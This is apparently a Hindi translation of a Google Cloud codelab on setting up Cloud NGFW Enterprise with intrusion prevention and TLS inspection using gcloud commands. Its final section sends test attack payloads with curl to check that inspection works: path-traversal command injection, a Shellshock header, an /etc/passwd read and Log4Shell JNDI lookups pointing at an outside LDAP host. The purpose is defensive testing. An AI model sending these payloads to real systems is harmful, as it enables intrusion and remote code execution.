1. परिचय
Cloud Next Generation Firewall (NGFW)
Cloud Next Generation Firewall, पूरी तरह से डिस्ट्रिब्यूट की गई फ़ायरवॉल सेवा है. इसमें सुरक्षा से जुड़ी ऐडवांस सुविधाएं, माइक्रो-सेगमेंटेशन, और हर जगह कवरेज की सुविधा मिलती है. इससे Google Cloud वर्कलोड को अंदरूनी और बाहरी हमलों से सुरक्षित रखा जा सकता है.
Cloud NGFW के ये फ़ायदे हैं:
- डिस्ट्रिब्यूट की गई फ़ायरवॉल सेवा: Cloud NGFW, हर वर्कलोड पर स्टेटफ़ुल और पूरी तरह से डिस्ट्रिब्यूट किया गया होस्ट-आधारित एनफ़ोर्समेंट उपलब्ध कराता है, ताकि ज़ीरो-ट्रस्ट सुरक्षा आर्किटेक्चर को चालू किया जा सके.
- आसान कॉन्फ़िगरेशन और डिप्लॉयमेंट: Cloud NGFW, नेटवर्क और क्रमबद्ध फ़ायरवॉल नीतियां लागू करता है. इन्हें संसाधन के क्रमबद्ध नोड से जोड़ा जा सकता है. इन नीतियों की मदद से, Google Cloud संसाधन के पूरे क्रम में फ़ायरवॉल की एक जैसी सुविधा मिलती है.
- ज़्यादा कंट्रोल और माइक्रो-सेगमेंटेशन: फ़ायरवॉल की नीतियों और Identity and Access Management (IAM) के तहत मैनेज किए गए टैग का इस्तेमाल करके, नॉर्थ-साउथ और ईस्ट-वेस्ट, दोनों तरह के ट्रैफ़िक को बेहतर तरीके से कंट्रोल किया जा सकता है. साथ ही, वर्चुअल प्राइवेट क्लाउड (VPC) नेटवर्क और संगठनों में, एक वीएम तक को कंट्रोल किया जा सकता है.
Cloud NGFW इन टियर में उपलब्ध है:
- Cloud Next Generation Firewall Essentials
- Cloud Next Generation Firewall Standard
- Cloud Next Generation Firewall Enterprise
Cloud NGFW Enterprise
Cloud NGFW Enterprise, डिस्ट्रिब्यूट किए गए Google Cloud फ़ायरवॉल फ़ैब्रिक में घुसपैठ रोकने वाली सेवा (आईपीएस) जोड़ता है. यह लेयर 7 की सुविधा है. टीएलएस की मदद से एन्क्रिप्ट (सुरक्षित) किए गए ट्रैफ़िक की जांच करने के लिए, टीएलएस की जांच करने की सुविधा उपलब्ध है.
अब आपके पास, लेयर 7 के भरोसेमंद नेक्स्ट जनरेशन फ़ायरवॉल (एनजीएफ़डब्ल्यू) की जांच को लागू करने का विकल्प है. इसमें आपको बारीकी से कंट्रोल करने की सुविधा मिलती है. इसके लिए, आपको अपने नेटवर्क आर्किटेक्चर या राउटिंग कॉन्फ़िगरेशन में कोई बदलाव नहीं करना होगा.
आईपीएस के साथ लेयर 7 फ़ायरवॉल कंट्रोल को चालू करने और डिप्लॉय करने के लिए, आपको ये काम करने होंगे:
- Google Cloud की ओर से मैनेज किए जाने वाले ज़ोनल फ़ायरवॉल एंडपॉइंट का सेट बनाएं.
- इसके अलावा, टीएलएस की जांच करने की नीति भी बनाई जा सकती है.
- इसके अलावा, ट्रस्ट कॉन्फ़िगरेशन भी बनाया जा सकता है.
- इन एंडपॉइंट को उन वर्चुअल प्राइवेट क्लाउड (वीपीसी) नेटवर्क से जोड़ें जहां आपको Cloud NGFW Enterprise सेवा की ज़रूरत है.
- अलग-अलग ट्रैफ़िक पाथ के लिए, थ्रेट प्रिवेंशन प्रोफ़ाइल तय करने के लिए, अपनी मौजूदा फ़ायरवॉल नीतियों और फ़ायरवॉल नियमों में सामान्य बदलाव करें.
नेटवर्क फ़ायरवॉल की नीतियां
नेटवर्क फ़ायरवॉल की नीति, फ़ायरवॉल के नियमों के लिए कंटेनर के तौर पर काम करती है. नेटवर्क फ़ायरवॉल की नीति में तय किए गए नियम, तब तक कहीं भी लागू नहीं होते, जब तक नीति को किसी वीपीसी नेटवर्क से नहीं जोड़ा जाता. हर वीपीसी नेटवर्क से एक नेटवर्क फ़ायरवॉल नीति जुड़ी हो सकती है. नेटवर्क फ़ायरवॉल की नीतियां, फ़ायरवॉल के नियमों में IAM के तहत मैनेज किए जाने वाले टैग (या सिर्फ़ टैग) का इस्तेमाल करने की अनुमति देती हैं. ये टैग, मौजूदा नेटवर्क टैग की जगह लेते हैं और इनका इस्तेमाल वर्कलोड को पहचान देने के लिए किया जा सकता है.
नेटवर्क फ़ायरवॉल की नीति को अलग-अलग नेटवर्क के साथ शेयर किया जा सकता है. साथ ही, इसे आईएएम के तहत आने वाले टैग के साथ इंटिग्रेट किया जा सकता है. इससे फ़ायरवॉल को कॉन्फ़िगर और मैनेज करना बहुत आसान हो जाता है.
नेटवर्क फ़ायरवॉल नीति लागू होने के बाद, Google Cloud की फ़ायरवॉल नीतियों में अब ये कॉम्पोनेंट शामिल हैं:
- क्रमिक फ़ायरवॉल नीति
- वीपीसी फ़ायरवॉल के नियम
- नेटवर्क फ़ायरवॉल की नीति ( ग्लोबल और रीजनल)
क्रम के हिसाब से फ़ायरवॉल की नीतियां, संसाधन के क्रम में संगठन और फ़ोल्डर नोड पर लागू होती हैं. वहीं, वीपीसी फ़ायरवॉल के नियम और नेटवर्क फ़ायरवॉल की नीतियां, वीपीसी लेवल पर लागू होती हैं. VPC फ़ायरवॉल के नियमों और नेटवर्क फ़ायरवॉल की नीतियों के बीच एक बड़ा अंतर यह है कि VPC फ़ायरवॉल के नियमों को सिर्फ़ एक VPC नेटवर्क पर लागू किया जा सकता है. वहीं, नेटवर्क फ़ायरवॉल की नीतियों को एक VPC या VPC के ग्रुप से जोड़ा जा सकता है. इसके अलावा, बैच अपडेट जैसे अन्य फ़ायदे भी मिलते हैं.
आखिर में, हमारे पास इंप्लाइड फ़ायरवॉल के नियम भी हैं. ये हर वीपीसी नेटवर्क के साथ आते हैं:
- ऐसा इग्रेस नियम जिसकी कार्रवाई की अनुमति है और डेस्टिनेशन 0.0.0.0/0 है
- इनग्रेस का ऐसा नियम जिसमें कार्रवाई के तौर पर अनुमति नहीं दी गई है और सोर्स 0.0.0.0/0 है
नीचे दिए गए डायग्राम में, डिफ़ॉल्ट रूप से नीति उल्लंघन ठीक करने का क्रम दिखाया गया है:
कृपया ध्यान दें कि वीपीसी फ़ायरवॉल के नियमों और ग्लोबल नेटवर्क फ़ायरवॉल की नीति के बीच, लागू करने का क्रम बदला जा सकता है. ग्राहक, gcloud कमांड का इस्तेमाल करके, किसी भी समय नीति लागू करने का क्रम तय कर सकते हैं.
टैग
नेटवर्क फ़ायरवॉल की नीति के नियमों में इंटिग्रेट किए गए नए टैग, की-वैल्यू पेयर वाले ऐसे संसाधन होते हैं जिन्हें Google Cloud संसाधन के क्रम के संगठन या प्रोजेक्ट-लेवल पर तय किया जाता है. इस तरह के टैग में IAM ऐक्सेस कंट्रोल होते हैं. इनसे यह तय किया जाता है कि टैग पर कौन क्या कर सकता है. पहचान और ऐक्सेस मैनेजमेंट (IAM) अनुमतियों की मदद से, यह तय किया जा सकता है कि कौनसे प्रिंसिपल, टैग को वैल्यू असाइन कर सकते हैं और कौनसे प्रिंसिपल, टैग को संसाधनों से जोड़ सकते हैं. अगर नेटवर्क फ़ायरवॉल का कोई नियम, किसी टैग का रेफ़रंस देता है, तो उसे लागू करने के लिए किसी संसाधन पर लागू किया जाना चाहिए.
टैग, Google Cloud के इनहेरिटेंस रिसॉर्स मॉडल के मुताबिक काम करते हैं. इसका मतलब है कि टैग और उनकी वैल्यू, पैरंट से उनकी पूरी हैरारकी में पास की जाती हैं. इस वजह से, टैग एक जगह पर बनाए जा सकते हैं. इसके बाद, इनका इस्तेमाल संसाधन के पूरे क्रम में मौजूद अन्य फ़ोल्डर और प्रोजेक्ट में किया जा सकता है. टैग और ऐक्सेस से जुड़ी पाबंदी के बारे में जानकारी पाने के लिए, इस पेज पर जाएं.
टैग को नेटवर्क टैग के साथ भ्रमित नहीं किया जाना चाहिए. ये ऐसी स्ट्रिंग होती हैं जिन्हें Compute Engine इंस्टेंस में जोड़ा जा सकता है. ये इंस्टेंस से जुड़ी होती हैं और इंस्टेंस के बंद होने पर गायब हो जाती हैं. VPC फ़ायरवॉल के नियमों में नेटवर्क टैग शामिल हो सकते हैं. हालांकि, इन्हें क्लाउड संसाधन नहीं माना जाता. इसलिए, इन पर IAM ऐक्सेस कंट्रोल लागू नहीं होता.
ध्यान दें कि इस दस्तावेज़ में, टैग और IAM से कंट्रोल किए जाने वाले टैग का इस्तेमाल एक-दूसरे की जगह पर किया जा रहा है.
आपको क्या बनाने को मिलेगा
इस कोडलैब के लिए, एक प्रोजेक्ट की ज़रूरत होती है. साथ ही, वीपीसी नेटवर्क बनाने और कई नेटवर्क और सुरक्षा संसाधनों को मैनेज करने की सुविधा भी होनी चाहिए. इससे यह पता चलेगा कि Cloud NGFW Enterprise, आईपीएस की सुविधा कैसे दे सकता है. इसके लिए, वह ये काम करता है:
- TLS की जांच की सुविधा का इस्तेमाल करके, नॉर्थबाउंड इंटरनेट फ़्लो की जांच करना
- TLS की जांच की सुविधा का इस्तेमाल करके, एक ही वीपीसी में मौजूद फ़्लो [ईस्ट-वेस्ट] की जांच करना
जिन फ़्लो की जांच करनी है उन्हें Cloud Firewall के मैचिंग पैरामीटर का इस्तेमाल करके चुना जाएगा. इनमें 5-टपल (सोर्स आईपी, डेस्टिनेशन आईपी, प्रोटोकॉल, सोर्स पोर्ट, डेस्टिनेशन पोर्ट) और टैग शामिल हैं.
नेटवर्क फ़ायरवॉल की नीति के नियम के आधार पर, नेटवर्क की आखिरी स्थिति इस टेबल में दी गई जानकारी के मुताबिक होगी:
प्राथमिकता | दिशा | Target | सोर्स | डेस्टिनेशन | कार्रवाई | टाइप |
100 | इन्ग्रेस डेटा ट्रैफ़िक | Server_Tag | सेहत से जुड़े आकलन | कोई भी | अनुमति दें | Essentials |
200 | इन्ग्रेस डेटा ट्रैफ़िक | Client_Tag, Server_Tag | IAP | कोई भी | अनुमति दें | Essentials |
800 | इन्ग्रेस डेटा ट्रैफ़िक | Server_Tag | 10.0.0.0/24 | 10.0.0.0/24 | L7 की जांच | Enterprise |
850 | इग्रेस डेटा ट्रैफ़िक | Client_Tag | कोई भी | 10.0.0.0/24 | अनुमति दें | Essentials |
900 | इग्रेस डेटा ट्रैफ़िक | Client_Tag | कोई भी | कोई भी | L7 की जांच | Enterprise |
आपको क्या सीखने को मिलेगा
- नेटवर्क फ़ायरवॉल की नीति बनाने का तरीका.
- नेटवर्क फ़ायरवॉल की नीति के साथ टैग बनाने और उनका इस्तेमाल करने का तरीका.
- टीएलएस की मदद से सुरक्षा जांच करने की सुविधा के साथ Cloud NGFW Enterprise को कॉन्फ़िगर और इस्तेमाल करने का तरीका.
आपको इन चीज़ों की ज़रूरत होगी
- Google Cloud प्रोजेक्ट.
- इंस्टेंस डिप्लॉय करने और नेटवर्किंग कॉम्पोनेंट कॉन्फ़िगर करने की जानकारी.
- वीपीसी फ़ायरवॉल कॉन्फ़िगरेशन के बारे में जानकारी.
2. शुरू करने से पहले
वैरिएबल बनाना/अपडेट करना
इस कोडलैब में, Cloud Shell में gcloud कॉन्फ़िगरेशन लागू करने में मदद करने के लिए, $variables का इस्तेमाल किया गया है.
Cloud Shell में, नीचे दी गई कमांड चलाएं. साथ ही, ब्रैकेट में दी गई जानकारी को अपनी ज़रूरत के हिसाब से बदलें:
gcloud config set project [project-id] export project_id=$(gcloud config list --format="value(core.project)") export project_number=`gcloud projects describe $project_id --format="value(projectNumber)"` export org_id=$(gcloud projects get-ancestors $project_id --format="csv[no-heading](id,type)" | grep ",organization$" | cut -d"," -f1 ) export region=[region] export zone=[zone] export prefix=ngfw-enterprise export billing_project=[billing-project-id]
3. एपीआई चालू करें
अगर आपने एपीआई चालू नहीं किए हैं, तो इन्हें चालू करें:
gcloud services enable networksecurity.googleapis.com gcloud services enable certificatemanager.googleapis.com gcloud services enable networkservices.googleapis.com gcloud services enable privateca.googleapis.com
4. Cloud NGFW Enterprise में एंडपॉइंट बनाना
Cloud NGFW Enterprise एंडपॉइंट बनाने में करीब 20 मिनट लगते हैं. इसलिए, इसे सबसे पहले बनाया जाएगा. साथ ही, एंडपॉइंट बनने के दौरान ही, बुनियादी सेटअप किया जा सकता है.
सुरक्षा प्रोफ़ाइल और सुरक्षा प्रोफ़ाइल ग्रुप बनाएं:
gcloud network-security security-profiles threat-prevention \ create $prefix-sp-threat \ --organization $org_id \ --location=global gcloud network-security security-profile-groups create \ $prefix-spg \ --organization $org_id \ --location=global \ --threat-prevention-profile organizations/$org_id/locations/global/securityProfiles/$prefix-sp-threat
अनुमानित आउटपुट:
Waiting for security-profile [organizations/$org_id/locations/global/securityProfiles/$prefix-sp-threat] to be created...done. Waiting for operation [organizations/$org_id/locations/global/operations/operation-1687458013374-5febbef75e993-ea522924-c963d150] to complete...done.
पुष्टि करें कि संसाधन बन गए हैं:
gcloud network-security security-profiles threat-prevention \ list --location=global --organization $org_id gcloud network-security security-profile-groups list \ --organization $org_id --location=global
अनुमानित आउटपुट (ध्यान दें कि इस्तेमाल किए जा रहे क्लाइंट के हिसाब से, आउटपुट का फ़ॉर्मैट अलग-अलग हो सकता है:
NAME: ngfw-enterprise-sp-threat NAME: ngfw-enterprise-spg
Cloud NGFW Enterprise एंडपॉइंट बनाएं:
gcloud network-security firewall-endpoints create $prefix-$zone \ --zone=$zone \ --organization $org_id \ --billing-project=$billing_project
नीचे दिए गए निर्देश को चलाकर पुष्टि करें कि एंडपॉइंट बनाया जा रहा है (CREATING).
gcloud network-security firewall-endpoints list --zone $zone \ --organization $org_id
अनुमानित आउटपुट (ध्यान दें कि इस्तेमाल किए जा रहे क्लाइंट के हिसाब से, आउटपुट का फ़ॉर्मैट अलग-अलग हो सकता है):
ID: $prefix-$zone LOCATION: $zone STATE: CREATING
ज़्यादा जानकारी पाने के लिए, नीचे दी गई कमांड चलाएं. हालांकि, ऐसा करना ज़रूरी नहीं है:
gcloud network-security firewall-endpoints describe \ $prefix-$zone --organization $org_id --zone $zone
अनुमानित आउटपुट:
createTime: '2023-11-16T04:27:17.677731831Z' name: organizations/$org_id/locations/$zone/firewallEndpoints/$prefix-$zone state: CREATING updateTime: '2023-11-16T04:27:17.677731831Z'
इसे बनाने में करीब 20 मिनट लगते हैं. ज़रूरी संसाधन बनाने के लिए, बेस सेटअप सेक्शन पर जाएं.
5. बेसिक सेटअप
वीपीसी नेटवर्क और सबनेट
वीपीसी नेटवर्क और सबनेट
वीपीसी नेटवर्क और सबनेट बनाएं:
gcloud compute networks create $prefix-vpc --subnet-mode=custom gcloud compute networks subnets create $prefix-$region-subnet \ --range=10.0.0.0/24 --network=$prefix-vpc --region=$region
Cloud NAT
Cloud Router और Cloud NAT गेटवे बनाएं:
gcloud compute addresses create $prefix-$region-cloudnatip --region=$region export cloudnatip=$(gcloud compute addresses list --filter=name:$prefix-$region-cloudnatip --format="value(address)") gcloud compute routers create $prefix-cr \ --region=$region --network=$prefix-vpc gcloud compute routers nats create $prefix-cloudnat-$region \ --router=$prefix-cr --router-region $region \ --nat-all-subnet-ip-ranges \ --nat-external-ip-pool=$prefix-$region-cloudnatip
इंस्टेंस
क्लाइंट और वेब-सर्वर इंस्टेंस बनाएं:
gcloud compute instances create $prefix-$zone-client \
--subnet=$prefix-$region-subnet --no-address --zone $zone \
--metadata startup-script='#! /bin/bash
apt-get update
apt-get install apache2-utils mtr iperf3 tcpdump -y'
gcloud compute instances create $prefix-$zone-www \
--subnet=$prefix-$region-subnet --no-address --zone $zone \
--metadata startup-script='#! /bin/bash
apt-get update
apt-get install apache2 tcpdump -y
a2ensite default-ssl
a2enmod ssl
# Read VM network configuration:
md_vm="http://169.254.169.254/computeMetadata/v1/instance/"
vm_hostname="$(curl $md_vm/name -H "Metadata-Flavor:Google" )"
filter="{print \$NF}"
vm_network="$(curl $md_vm/network-interfaces/0/network \
-H "Metadata-Flavor:Google" | awk -F/ "${filter}")"
vm_zone="$(curl $md_vm/zone \
-H "Metadata-Flavor:Google" | awk -F/ "${filter}")"
# Apache configuration:
echo "Page on $vm_hostname in network $vm_network zone $vm_zone" | \
tee /var/www/html/index.html
systemctl restart apache2'
प्रोजेक्ट-लेवल के टैग
अगर ज़रूरी हो, तो उपयोगकर्ता को tagAdmin की अनुमति असाइन करें if:
export user_id=$(gcloud auth list --format="value(account)") gcloud projects add-iam-policy-binding $project_id --member user:$user_id --role roles/resourcemanager.tagAdmin
प्रोजेक्ट-लेवल पर टैग कुंजी और वैल्यू बनाएं:
gcloud resource-manager tags keys create $prefix-vpc-tags \ --parent projects/$project_id \ --purpose GCE_FIREWALL \ --purpose-data network=$project_id/$prefix-vpc gcloud resource-manager tags values create $prefix-vpc-client \ --parent=$project_id/$prefix-vpc-tags gcloud resource-manager tags values create $prefix-vpc-server \ --parent=$project_id/$prefix-vpc-tags
टैग को इंस्टेंस से बाइंड करें:
gcloud resource-manager tags bindings create \ --location $zone \ --tag-value $project_id/$prefix-vpc-tags/$prefix-vpc-server \ --parent //compute.googleapis.com/projects/$project_id/zones/$zone/instances/$prefix-$zone-www gcloud resource-manager tags bindings create \ --location $zone \ --tag-value $project_id/$prefix-vpc-tags/$prefix-vpc-client \ --parent //compute.googleapis.com/projects/$project_id/zones/$zone/instances/$prefix-$zone-client
ग्लोबल नेटवर्क फ़ायरवॉल नीति
ग्लोबल नेटवर्क फ़ायरवॉल की नीति बनाएं:
gcloud compute network-firewall-policies create \ $prefix-fwpolicy --description \ "Cloud NGFW Enterprise with TLS" --global
health-check और identity-aware proxy रेंज से ट्रैफ़िक की अनुमति देने के लिए, Cloud Firewall के ज़रूरी नियम बनाएं:
gcloud compute network-firewall-policies rules create 100 \
--description="allow http traffic from health-checks ranges" \
--action=allow \
--firewall-policy=$prefix-fwpolicy \
--global-firewall-policy \
--layer4-configs=tcp:80,tcp:443 \
--direction=INGRESS \
--target-secure-tags $project_id/$prefix-vpc-tags/$prefix-vpc-server \
--src-ip-ranges=35.191.0.0/16,130.211.0.0/22,209.85.152.0/22,209.85.204.0/22
gcloud compute network-firewall-policies rules create 200 \
--description="allow ssh traffic from identity-aware-proxy ranges" \
--action=allow \
--firewall-policy=$prefix-fwpolicy \
--global-firewall-policy \
--layer4-configs=tcp:22 \
--direction=INGRESS \
--target-secure-tags $project_id/$prefix-vpc-tags/$prefix-vpc-server,$project_id/$prefix-vpc-tags/$prefix-vpc-client \
--src-ip-ranges=35.235.240.0/20
ज़रूरी Cloud Firewall के नियम बनाएं, ताकि खास रेंज से ईस्ट-वेस्ट / इंट्रा-सबनेट ट्रैफ़िक को अनुमति दी जा सके. इन नियमों को अपडेट किया जाएगा, ताकि टीएलएस की सुरक्षा जांच के साथ Cloud NGFW Enterprise को चालू किया जा सके:
gcloud compute network-firewall-policies rules create 800 \
--description "allow ingress internal traffic from tagged clients" \
--action=allow \
--firewall-policy=$prefix-fwpolicy \
--global-firewall-policy \
--direction=INGRESS \
--enable-logging \
--layer4-configs tcp:443 \
--src-ip-ranges=10.0.0.0/24 \
--dest-ip-ranges=10.0.0.0/24 \
--target-secure-tags $project_id/$prefix-vpc-tags/$prefix-vpc-server
क्लाउड फ़ायरवॉल की नीति को वीपीसी नेटवर्क से जोड़ें:
gcloud compute network-firewall-policies associations create \
--firewall-policy $prefix-fwpolicy \
--network $prefix-vpc \
--name $prefix-fwpolicy-association \
--global-firewall-policy
6. Cloud Firewall Endpoint Association
अगर आपने अब तक एनवायरमेंट वैरिएबल तय नहीं किए हैं और/या आपको स्क्रिप्ट का इस्तेमाल करना है, तो एनवायरमेंट वैरिएबल तय करें.
पुष्टि करें कि Cloud Firewall Endpoint बनाने की प्रोसेस पूरी हो गई है. जब स्थिति चालू है के तौर पर दिखे, तब ही आगे बढ़ें. हालांकि, बनाते समय स्थिति बनाया जा रहा है के तौर पर दिखती है:
gcloud network-security firewall-endpoints list --zone $zone \ --organization $org_id
अनुमानित आउटपुट (ध्यान दें कि इस्तेमाल किए जा रहे क्लाइंट के हिसाब से, आउटपुट का फ़ॉर्मैट अलग-अलग हो सकता है):
ID: $prefix-$zone LOCATION: $zone STATE: ACTIVE
ज़्यादा जानकारी पाने के लिए, नीचे दी गई कमांड चलाएं. हालांकि, ऐसा करना ज़रूरी नहीं है:
gcloud network-security firewall-endpoints describe \ $prefix-$zone --organization $org_id --zone $zone
अनुमानित आउटपुट:
createTime: '2023-11-16T04:27:17.677731831Z' name: organizations/$org_id/locations/$zonefirewallEndpoints/$prefix-$zone state: ACTIVE updateTime: '2023-11-16T04:49:53.776349352Z'
Cloud Firewall एंडपॉइंट को VPC नेटवर्क से जोड़ें:
gcloud network-security firewall-endpoint-associations create \ $prefix-association --zone $zone \ --network=$prefix-vpc \ --endpoint $prefix-$zone \ --organization $org_id
खाता लिंक करने में करीब 10 मिनट लगते हैं. जब स्थिति चालू है के तौर पर दिखे, तब ही टीएलएस सेक्शन पर जाएं. हालांकि, बनाते समय स्थिति बनाया जा रहा है के तौर पर दिखती है:
gcloud network-security firewall-endpoint-associations list
पूरा होने पर अनुमानित आउटपुट:
ID: ngfw-enterprise-association LOCATION: $zone NETWORK: $prefix-vpc ENDPOINT: $prefix-$zone STATE: ACTIVE
ज़्यादा जानकारी पाने के लिए, नीचे दी गई कमांड चलाएं. हालांकि, ऐसा करना ज़रूरी नहीं है:
gcloud network-security firewall-endpoint-associations \ describe $prefix-association --zone $zone
अनुमानित आउटपुट:
createTime: '2023-11-16T04:57:06.108377222Z' firewallEndpoint: organizations/$org_id/locations/$zone/firewallEndpoints/$prefix-$zone name: projects/$project_id/locations/$zone/firewallEndpointAssociations/$prefix-association network: projects/$project_id/global/networks/$prefix-vpc state: ACTIVE updateTime: '2023-11-16T04:57:06.108377222Z'
7. TLS रिसॉर्स कॉन्फ़िगर करना
सीए पूल बनाएं. इस संसाधन का इस्तेमाल, NGFW Enterprise के लिए जनरेट किए गए रूट सीए सर्टिफ़िकेट को सेव करने के लिए किया जाएगा.
gcloud privateca pools create $prefix-CA-Pool --project=$project_id --location=$region --tier=enterprise
रूट सीए बनाएं. यह सीए सर्टिफ़िकेट है. इसका इस्तेमाल, NGFW Enterprise के ज़रिए किए गए अनुरोधों के लिए अतिरिक्त सर्टिफ़िकेट पर हस्ताक्षर करने के लिए किया जाएगा.
gcloud privateca roots create $prefix-CA-Root --project=$project_id --location=$region --pool=$prefix-CA-Pool --subject="CN=NGFW Enterprise Test CA 2, O=Google NGFW Enterprise Test"
अगर आपको नीचे दिया गया मैसेज दिखता है, तो y जवाब दें:
The CaPool [ngfw-enterprise-CA-Pool] has no enabled CAs and cannot issue any certificates until at least one CA is enabled. Would you like to also enable this CA? Do you want to continue (y/N)?
कोई सेवा खाता बनाएं. इस सेवा खाते का इस्तेमाल, NGFW Enterprise के लिए सर्टिफ़िकेट का अनुरोध करने के लिए किया जाएगा:
gcloud beta services identity create --service=networksecurity.googleapis.com --project=$project_id
सेवा खाते के लिए आईएएम अनुमतियां सेट करें:
gcloud privateca pools add-iam-policy-binding $prefix-CA-Pool --project=$project_id --location=$region --member=serviceAccount:service-$project_number@gcp-sa-networksecurity.iam.gserviceaccount.com --role=roles/privateca.certificateRequester
TLS नीति की YAML फ़ाइल बनाएं. इस फ़ाइल में, इन संसाधनों के बारे में जानकारी होगी:
cat > tls_policy.yaml << EOF description: Test tls inspection policy. name: projects/$project_id/locations/$region/tlsInspectionPolicies/$prefix-tls-policy caPool: projects/$project_id/locations/$region/caPools/$prefix-CA-Pool excludePublicCaSet: false EOF
TLS कनेक्शन की जांच करने की नीति इंपोर्ट करें:
gcloud network-security tls-inspection-policies import $prefix-tls-policy --project=$project_id --location=$region --source=tls_policy.yaml
टीएलएस चालू करने के लिए, एंडपॉइंट के साथ एसोसिएशन को अपडेट करें:
gcloud network-security firewall-endpoint-associations update $prefix-association --zone=$zone --project=$project_id --tls-inspection-policy=$prefix-tls-policy --tls-inspection-policy-project=$project_id --tls-inspection-policy-region=$region
CA सर्टिफ़िकेट पाएं और उसे क्लाइंट के CA स्टोर में जोड़ें:
gcloud privateca roots describe $prefix-CA-Root --project=$project_id --pool=$prefix-CA-Pool --location=$region --format="value(pemCaCertificates)" >> $prefix-CA-Root.crt
CA सर्टिफ़िकेट को क्लाइंट को ट्रांसफ़र करें:
gcloud compute scp --tunnel-through-iap ~/$prefix-CA-Root.crt $prefix-$zone-client:~/ --zone=$zone
वीएम से SSH करें, CA सर्टिफ़िकेट को /usr/local/share/ca-certificates पर ले जाएं, और CA स्टोर को अपडेट करें:
gcloud compute ssh $prefix-$zone-client --tunnel-through-iap --zone $zone sudo mv ngfw-enterprise-CA-Root.crt /usr/local/share/ca-certificates/ sudo update-ca-certificates
cloudshell पर वापस जाएं.
सर्वर सर्टिफ़िकेट साइन करने की प्रोसेस:
Cloud Shell पर, pip कमांड का इस्तेमाल करके Pyca cryptography लाइब्रेरी इंस्टॉल करें:
pip install --user "cryptography>=2.2.0"
Google Cloud SDK को Pyca cryptography लाइब्रेरी का इस्तेमाल करने की अनुमति देने के लिए, आपको साइट पैकेज चालू करने होंगे.
export CLOUDSDK_PYTHON_SITEPACKAGES=1
सर्वर सर्टिफ़िकेट बनाएं:
gcloud privateca certificates create --issuer-location=$region \ --issuer-pool $prefix-CA-Pool \ --subject "CN=Cloud NGFW Enterprise,O=Google" \ --ip-san=10.0.0.3 \ --generate-key \ --key-output-file=./key.pem \ --cert-output-file=./cert.pem
इससे cloudshell में cert.pem और key.pem फ़ाइल जनरेट होगी. इसके बाद, सर्टिफ़िकेट और कुंजी को सर्वर पर ट्रांसफ़र करें.
gcloud compute scp --tunnel-through-iap ~/cert.pem $prefix-$zone-www:~/ --zone=$zone gcloud compute scp --tunnel-through-iap ~/key.pem $prefix-$zone-www:~/ --zone=$zone
Apache के लिए सर्टिफ़िकेट की जानकारी अपडेट करने के लिए, सर्वर में SSH करें:
gcloud compute ssh $prefix-$zone-www --tunnel-through-iap --zone $zone
सर्टिफ़िकेट और कुंजी को किसी फ़ोल्डर में ले जाएं:
sudo mv cert.pem /etc/ssl/certs/ sudo mv key.pem /etc/ssl/private/
हस्ताक्षर किए गए सर्टिफ़िकेट का इस्तेमाल करने के लिए, एसएसएल कॉन्फ़िगरेशन अपडेट करें:
sudo sed -i 's/ssl-cert-snakeoil.pem/cert.pem/g' /etc/apache2/sites-available/default-ssl.conf sudo sed -i 's/ssl-cert-snakeoil.key/key.pem/g' /etc/apache2/sites-available/default-ssl.conf
Apache को रीस्टार्ट करने के लिए:
sudo systemctl restart apache2
Apache की स्थिति की पुष्टि करें:
sudo systemctl status apache2
यह चालू होना चाहिए.
वीएम से बाहर निकलें और Cloud Shell पर जारी रखें.
8. नॉर्थबाउंड और ई/डब्ल्यू कनेक्टिविटी की पुष्टि करना
Cloud Shell में यहां दिए गए निर्देश चलाएं और इस्तेमाल किए जाने वाले टारगेट आईपी पते नोट करें:
gcloud compute instances list --filter="name=($prefix-$zone-www)"
नया टैब खोलें और IAP के ज़रिए क्लाइंट वीएम से SSH कनेक्शन शुरू करें. इसके लिए, आपको नए टैब में वैरिएबल तय करने होंगे:
gcloud compute ssh $prefix-$zone-client --tunnel-through-iap --zone $zone
नीचे दी गई कमांड चलाएं और इस्तेमाल किए जाने वाले टारगेट आईपी पतों को नोट करें. ब्रैकेट में दी गई वैल्यू को पिछले चरण में नोट किए गए आईपी पतों से बदलकर वैरिएबल बनाएं. साथ ही, पक्का करें कि उन तक पहुंचा जा सकता हो:
export target_privateip=[INTERNAL_IP_OF_WWW_SERVER]
प्राइवेट आईपी को कर्ल करें और पक्का करें कि यह पहुंच योग्य हो:
curl https://$target_privateip --max-time 2
कर्ल अनुरोध के लिए संभावित नतीजे:
Page on ngfw-enterprise-$zone-www in network ngfw-enterprise-vpc zone $zone
आईपी पते पर हमले के सैंपल भेजें. वेब सर्वर को सभी अनुरोधों का जवाब देना चाहिए. इससे यह पुष्टि होती है कि L7 की जांच/रोकथाम की सुविधा चालू नहीं है:
curl -w "%{http_code}\\n" -s -o /dev/null https://$target_privateip/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh --data 'echo Content-Type: text/plain; echo; uname -a' --max-time 2
curl -w "%{http_code}\\n" -s -o /dev/null https://$target_privateip/cgi-bin/user.sh -H 'FakeHeader:() { :; }; echo Content-Type: text/html; echo ; /bin/uname -a' --max-time 2
curl -w "%{http_code}\\n" -s -o /dev/null https://$target_privateip/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd --max-time 2
curl -w "%{http_code}\\n" -s -o /dev/null -H 'User-Agent: ${jndi:ldap://123.123.123.123:8055/a}' https://$target_privateip --max-time 2
curl -w "%{http_code}\\n" -s -o /dev/null -H 'User-Agent: ${jndi:ldap://123.123.123.123:8081/a}' https://$target_privateip --max-time 2
अनुमानित नतीजों का उदाहरण (निजी आईपी):
400 404 400 200 200
इसी तरह, इंटरनेट डेस्टिनेशन पर अनुरोध भेजें:
curl -s -o /dev/null -w "%{http_code}\n" https://www.eicar.org/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh --data 'echo Content-Type: text/plain; echo; uname -a' --max-time 2
curl -s -o /dev/null -w "%{http_code}\n" https://www.eicar.org/cgi-bin/user.sh -H 'FakeHeader:() { :; }; echo Content-Type: text/html; echo ; /bin/uname -a' --max-time 2
curl -s -o /dev/null -w "%{http_code}\n" https://www.eicar.org/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd --max-time 2
curl -s -o /dev/null -w "%{http_code}\n" -H 'User-Agent: ${jndi:ldap://123.123.123.123:8055/a}' https://www.eicar.org --max-time 2
curl -s -o /dev/null -w "%{http_code}\n" -H 'User-Agent: ${jndi:ldap://123.123.123.123:8081/a}' https://www.eicar.org --max-time 2
इंटरनेट डेस्टिनेशन के लिए, अनुमानित नतीजों का सैंपल:
400 404 400 403 403
